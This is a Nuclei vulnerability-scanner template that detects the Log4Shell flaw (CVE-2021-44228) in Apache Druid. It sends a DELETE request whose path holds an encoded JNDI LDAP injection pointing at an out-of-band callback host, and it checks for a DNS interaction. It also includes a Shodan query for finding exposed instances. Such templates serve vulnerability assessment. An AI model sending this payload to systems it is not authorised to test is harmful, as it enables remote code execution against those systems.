nuclei-templates/http/vulnerabilities/other/apache-druid-log4j.yaml

38 lines
869 B
YAML

id: apache-druid-log4j
info:
name: Apache Druid - Remote Code Execution (Apache Log4j)
author: SleepingBag945
severity: critical
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-502
metadata:
max-request: 1
verified: true
shodan-query: title:"Apache Druid"
tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast
http:
- method: DELETE
path:
- "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 404